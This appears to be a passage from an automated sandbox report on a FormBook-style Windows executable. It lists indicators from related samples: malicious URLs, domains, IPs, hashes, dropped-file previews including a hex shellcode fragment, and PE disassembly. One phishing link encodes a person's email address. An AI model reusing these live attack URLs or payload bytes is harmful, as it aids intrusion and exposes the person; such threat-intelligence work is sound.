                                            • www.credit-cards-54889.com/mi94/?w88pk=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&Sr94=9rXXvvGp
                                            Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.credit-cards-54889.com/mi94/?C2JhjJw=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&DDKH4=7ndL1VtpC
                                            188.114.97.362b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            • podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.php
                                            MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                                            • www.ilodezu.com/z48v/
                                            RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                                            • www.intervisitation.sbs/clrm/
                                            aAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                                            • www.fin4d-sl.com/dy13/?GdIHAFZ=MC4QZEftrgtCVvoYAYxBXZxxSCJu24Hzj16GKJrL5MOAuB5Jt3GFkekm4l21S7hYr6F9&BhU=5jl0ddZhNnYlOrV0
                                            http://sp.26skins.com/steamstore/category/action_run_jump/?snr=1_1530_4__12Get hashmaliciousUnknownBrowse
                                            • sp.26skins.com/favicon.ico
                                            Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
                                            • www.oc7o0.top/2zff/?iHmHOtK=4L8xoD0W4Zo4sy88OPxzXkM4Et1OXrliZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk7znic/DfJyEGJbg1Pv28u2ofuxZkWteJjYs=&L480=nFsp
                                            30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
                                            • filetransfer.io/data-package/TbaYPT0S/download
                                            nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                                            • www.coinwab.com/efdt/
                                            hkLFB22XxS.exeGet hashmaliciousFormBookBrowse
                                            • www.cavetta.org.mt/yhnb/
                                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • filetransfer.io/data-package/mJcm5Gfa/download

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            edge.redirect.pizzaTkaDXQzKZg.exeGet hashmaliciousFormBookBrowse
                                            • 89.106.200.1
                                            e-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 89.106.200.1
                                            Vadesiz Hesap - 9820-1083353.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 89.106.200.1
                                            www.gb-electric-wheelchairs-8j.bond2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                            • 185.53.179.91
                                            gt.huhusddfnsuegcdn.comGA4vpVYBVP.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • 194.41.37.193
                                            IZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                            • 194.41.37.124
                                            PO UE500168 #221.exeGet hashmaliciousFormBookBrowse
                                            • 194.41.37.111
                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                            • 216.83.32.137
                                            PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 143.92.39.253
                                            vimfN27ooR.exeGet hashmaliciousFormBookBrowse
                                            • 143.92.39.238
                                            zmyuUk3Y5G.exeGet hashmaliciousFormBookBrowse
                                            • 143.92.39.246
                                            www.babyscan.xyz2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                            • 3.64.163.50

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUShttp://beetrootculture.comGet hashmaliciousUnknownBrowse
                                            • 104.22.21.226
                                            https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            7EulSGn18e.exeGet hashmaliciousLummaCBrowse
                                            • 172.67.154.12
                                            NSLC_Billing_Document_No_0240255100.htmlGet hashmaliciousCVE-2024-21412Browse
                                            • 104.16.231.132
                                            62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            • 188.114.97.3
                                            GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                                            • 23.227.38.74
                                            7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            http://booking.extnnehotteir.com/admin/o2shi1bka89Get hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHKGA4vpVYBVP.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • 194.41.37.193
                                            IZPnmcCu5EZWa98.exeGet hashmaliciousFormBookBrowse
                                            • 194.41.37.124
                                            PO UE500168 #221.exeGet hashmaliciousFormBookBrowse
                                            • 194.41.37.111
                                            http://uspsqqww.worldGet hashmaliciousUnknownBrowse
                                            • 154.197.27.172
                                            SecuriteInfo.com.Win32.DropperX-gen.990.17898.exeGet hashmaliciousCobaltStrikeBrowse
                                            • 156.245.13.36
                                            SecuriteInfo.com.Win32.DropperX-gen.990.17898.exeGet hashmaliciousCobaltStrikeBrowse
                                            • 156.245.13.36
                                            https://eddy.yue.anquanbeian.ltd/?mail=name.e@example.com.cn&url=example.com.cnGet hashmaliciousUnknownBrowse
                                            • 45.207.49.187
                                            https://yda482.com/Get hashmaliciousUnknownBrowse
                                            • 45.207.45.122
                                            https://ece894.com/Get hashmaliciousUnknownBrowse
                                            • 45.207.45.122
                                            https://nsz286.com/Get hashmaliciousUnknownBrowse
                                            • 45.207.45.122
                                            AMAZON-02UShttps://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                            • 108.156.39.60
                                            7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                            • 3.64.163.50
                                            http://booking.extnnehotteir.com/admin/o2shi1bka89Get hashmaliciousUnknownBrowse
                                            • 18.239.36.121
                                            7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                            • 3.64.163.50
                                            5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                            • 3.64.163.50
                                            https://www.filemail.com/t/RuKZYfeBGet hashmaliciousHTMLPhisherBrowse
                                            • 18.239.69.107
                                            5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                            • 3.140.13.188
                                            d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                                            • 104.192.141.1
                                            7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                            • 76.223.105.230
                                            Quarantined Messages (1).zipGet hashmaliciousHTMLPhisherBrowse
                                            • 13.227.219.106
                                            TEAMINTERNET-ASDEhttp://pollyfill.ioGet hashmaliciousUnknownBrowse
                                            • 185.53.178.30
                                            mQY9ka5sW6hv2Ri.exeGet hashmaliciousFormBookBrowse
                                            • 185.53.179.90
                                            Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                                            • 185.53.177.31
                                            Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                                            • 185.53.177.31
                                            2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                            • 185.53.179.91
                                            DHL AWB DOCUMENT.pdf.exeGet hashmaliciousFormBookBrowse
                                            • 185.53.179.93
                                            yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                            • 185.53.177.112
                                            Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                                            • 185.53.179.92
                                            DHL ARRIVAL DOCUMENTS.pdf.exeGet hashmaliciousFormBookBrowse
                                            • 185.53.179.90
                                            Mbabane.exeGet hashmaliciousFormBookBrowse
                                            • 185.53.178.13
                                            AMAZON-02UShttps://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                            • 108.156.39.60
                                            7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                            • 3.64.163.50
                                            http://booking.extnnehotteir.com/admin/o2shi1bka89Get hashmaliciousUnknownBrowse
                                            • 18.239.36.121
                                            7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                            • 3.64.163.50
                                            5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                            • 3.64.163.50
                                            https://www.filemail.com/t/RuKZYfeBGet hashmaliciousHTMLPhisherBrowse
                                            • 18.239.69.107
                                            5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                            • 3.140.13.188
                                            d8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                                            • 104.192.141.1
                                            7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                            • 76.223.105.230
                                            Quarantined Messages (1).zipGet hashmaliciousHTMLPhisherBrowse
                                            • 13.227.219.106

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\aut82C5.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):184920
                                            Entropy (8bit):7.982904590777022
                                            Encrypted:false
                                            SSDEEP:3072:lezSjGBTPXRWzKdFQLiKCjEQMFq3zHncy7CxTKXeUkksrEscU2bHi8z:bEnaL8EQCqrDcT/UKrYU6i4
                                            MD5:BFC95972013A80FB99151758B818D8F4
                                            SHA1:310E1130E3743D97FCE8F805536D59FF5B834634
                                            SHA-256:4EBF76DA2837D8FBA4CFD1D38A48AD1FAB09D5E8A66FAB83EC31F74678F09C16
                                            SHA-512:CC9DD648EE0E6621A2C07C7272218D52FD892621B8AEB66C2C8F3A282B1F3B397B588C6BC46C8EAB4D4C0A1CF2310BD704651A7FD04A6475F618BAC4EA693FA0
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06.....Z.6m]2.G.@7Z*g.?..Yx.Z.#c..U..oV.P.NiTZM^.N....L.o0.M(`.......(....e...b..l'.q.TdskL.q!.Nj..MF.^.V...<..*.I,......Ee.j.J=Y..m....j.ZM.Z...k.8..K......^G.....>.O..M.~..zU...gu./b_........*.H.R..+..._Z.-..S.P(..- ..}N-..E..9..8.y.......aT....U>.H....2...1R.^ytZM..N..".).....@..../..F.....\.e)uzUx.\.\.....Y..@(.........\._...................._.U...mv'.P..(t.#..@3.Y...I.e..LO:._..d..}.1..W.Zg..K...4|&..A.U..Z.#....&.-v.q..~5t..v....<..GNa;.o.t}...,....g:...`4R......q!....S..;.:...=.j'V....J....iD...j)T..{...@....=N..v_.]....G...'.j...Y.+....9T......b........!t|&..........].u)4/...$.p....@...lv..5.u....>...EK.c{P../]A....L.kO...J....7.t...uG...t._MUgu...-.n>r..N1zJ.s.A....M.[......6.2.a5.......j.;.>.....9.z.g.B.f2..4..m..lS].ro...4..s.a..y>8.{}..w..<......1...E.R...~........>?..Au..~...._p\.W...jw.4....0.ar..z.-.o.....w..\.T.dwA...o.....G..6.=..I@.i ..~.s?..7..5.k..A.<.|........#..B.=}F..S..c.^.c....7..."-.Q...}..........k9.*].....*...N;.

                                            C:\Users\user\AppData\Local\Temp\aut8314.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9868
                                            Entropy (8bit):7.602758961594377
                                            Encrypted:false
                                            SSDEEP:192:65jwEiqQ9pW+hCZcbZ/wzJkecGgL98GtgFhPfOeRmb8vMDdfVVZ:I6qy2ZcbZ/YeecGgLKhPmeSaMDdfVVZ
                                            MD5:DFA9477F872A32EF14B38DAF92236F43
                                            SHA1:7B10809B3D4384AA587008BE459B5B5735CDCA74
                                            SHA-256:49DA1C10EDC100D99C81949C783C8CC14DFA849288DB8A99D77CBD85BBCA0E39
                                            SHA-512:6E4D42E53A054A4970084CC8EF1EC16E17208FB8C254AD0289A9620E253465E52A4AA63000BEA7691D28E4A7B9E331D600B8D18C4EFB6028FB8CB2FD65A79D96
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.|........}S{....7...| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i|v)....b.h.,@..%........9....c...|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

                                            C:\Users\user\AppData\Local\Temp\semispinalis

                                            Download File
                                            Process:C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):189440
                                            Entropy (8bit):7.884262324820212
                                            Encrypted:false
                                            SSDEEP:3072:hz3aITDLGnW/DWoV6QJP6Wl9vIPt2LQJ9d4t0nIshnvRUoj8CLm1P2:tKIX6W/DC2PNbta9d4aXnvRUowTY
                                            MD5:2FC699C00FA4977FA1676EE76FC3F601
                                            SHA1:44734011C3C676CBA771C365529C1C5407BAA175
                                            SHA-256:E67E23BB7D9C9702AC1F53ED89B5A26A260EEF369E8EC20C5FDE0D57BEF9100B
                                            SHA-512:691AF8B06343C21563648AFC265C73E5F3C20F0319CD435C6BC0ED464DDE01E53E27C1FC4DFA0170E5085D99D72135C119D74891CA508A630057C5BAC6CB36A4
                                            Malicious:false
                                            Reputation:low
                                            Preview:zj.f.LEGP...L..e.5B....W<...GPX9JEIWJNYK5AI270T4CLEGPX9JEI.JNYE*.G2.9...M..q.Q#6i'8!>9T,iQV^:[7l'"p*L$e 9j....,&VR.Y9IhEGPX9JE.B...S...Q...%..G...#.J..'..7....*..9;Q../.JNYK5AI270T4CLEG..9J.HVJ.2}{AI270T4C.EEQS8@EI.HNYK5AI270..BLEWPX9.GIWJ.YK%AI250T1CMEGPX9OEHWJNYK5.K272T4CLEGRXy.EIGJNIK5AI"70D4CLEGPH9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T.7)=3PX9..KWJ^YK5.K27 T4CLEGPX9JEIWJnYKUAI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9JEIWJNYK5AI270T4CLEGPX9

                                            C:\Users\user\AppData\Local\Temp\spiketop

                                            Download File
                                            Process:C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe
                                            File Type:ASCII text, with very long lines (28756), with no line terminators
                                            Category:dropped
                                            Size (bytes):28756
                                            Entropy (8bit):3.594828848310999
                                            Encrypted:false
                                            SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+Iw6lr4vfF3if6gyTx:miTZ+2QoioGRk6ZklputwjpjBkCiw2RE
                                            MD5:4532E37EF43D75CDE8566E9D071F404A
                                            SHA1:6517B75EE1958591407A32787034C01E3DE35381
                                            SHA-256:824BAA334FBC2C6B3304E1B2A357F7F276ECE1CB6AE649AF2BF7D9011BF2C6E8
                                            SHA-512:6D98788D604286BA27F0FAB7F4E35A7B7278AA89779C15FA1F8573F4C5DE15E9B763B4DCDA906A1E416604EAB2078271EBCFA309A4773CCC1367F95E2CDC2648
                                            Malicious:false
                                            Reputation:low
                                            Preview:8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.004154714013012
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:MKCC-MEC-RFQ-115-2024.exe
                                            File size:1'081'856 bytes
                                            MD5:11ab7d8a50ccafbb4d7b5c9e83e4ff4c
                                            SHA1:1e0d2f0564e8a8dc7237c98e3facc0e1b4b314cf
                                            SHA256:2eb137991ea1e48556d906d1e03bfaed1df13529dd2420031e6fc92b55c076d1
                                            SHA512:2e03c60963526576b3a75a488adb607d148888caa4a9be2177479ab762576082e5af2a7a8fd30e019c782dba36dfddc2b1a31c9f36d95bbbbc27a233a2610995
                                            SSDEEP:24576:PAHnh+eWsN3skA4RV1Hom2KXMmHat0nexrhALk5:yh+ZkldoPK8YateEt
                                            TLSH:F835AD0273D1C036FFABA2739B6AF60596BD79254123852F13981DB9BD701B2233D663
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                            File Icon

                                            Icon Hash:aaf3e3e3938382a0

                                            Static PE Info

                                            General

                                            Entrypoint:0x42800a
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66852A87 [Wed Jul 3 10:40:07 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:afcdf79be1557326c854b6e20cb900a7

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F98B8E57CFDh
                                            jmp 00007F98B8E4AAB4h
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            push edi
                                            push esi
                                            mov esi, dword ptr [esp+10h]
                                            mov ecx, dword ptr [esp+14h]
                                            mov edi, dword ptr [esp+0Ch]
                                            mov eax, ecx
                                            mov edx, ecx
                                            add eax, esi
                                            cmp edi, esi
                                            jbe 00007F98B8E4AC3Ah
                                            cmp edi, eax
                                            jc 00007F98B8E4AF9Eh
                                            bt dword ptr [004C41FCh], 01h
                                            jnc 00007F98B8E4AC39h
                                            rep movsb
                                            jmp 00007F98B8E4AF4Ch
                                            cmp ecx, 00000080h
                                            jc 00007F98B8E4AE04h
                                            mov eax, edi
                                            xor eax, esi
                                            test eax, 0000000Fh
                                            jne 00007F98B8E4AC40h
                                            bt dword ptr [004BF324h], 01h
                                            jc 00007F98B8E4B110h
                                            bt dword ptr [004C41FCh], 00000000h
                                            jnc 00007F98B8E4ADDDh
                                            test edi, 00000003h
                                            jne 00007F98B8E4ADEEh
                                            test esi, 00000003h
                                            jne 00007F98B8E4ADCDh
                                            bt edi, 02h
                                            jnc 00007F98B8E4AC3Fh
                                            mov eax, dword ptr [esi]
                                            sub ecx, 04h
                                            lea esi, dword ptr [esi+04h]
                                            mov dword ptr [edi], eax
                                            lea edi, dword ptr [edi+04h]
                                            bt edi, 03h
                                            jnc 00007F98B8E4AC43h
                                            movq xmm1, qword ptr [esi]
                                            sub ecx, 08h
                                            lea esi, dword ptr [esi+08h]
                                            movq qword ptr [edi], xmm1
                                            lea edi, dword ptr [edi+08h]
                                            test esi, 00000007h
                                            je 00007F98B8E4AC95h
                                            bt esi, 03h

                                            Rich Headers

                                            Programming Language:
                                            • [ASM] VS2013 build 21005
                                            • [ C ] VS2013 build 21005
                                            • [C++] VS2013 build 21005
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            • [ASM] VS2013 UPD5 build 40629
                                            • [RES] VS2013 build 21005
                                            • [LNK] VS2013 UPD5 build 40629

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x3db5c.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1060000x7134.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0xc80000x3db5c0x3dc00a329608b79246d69381ac2e6cc327474False0.8937760943825911data7.810519453142418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
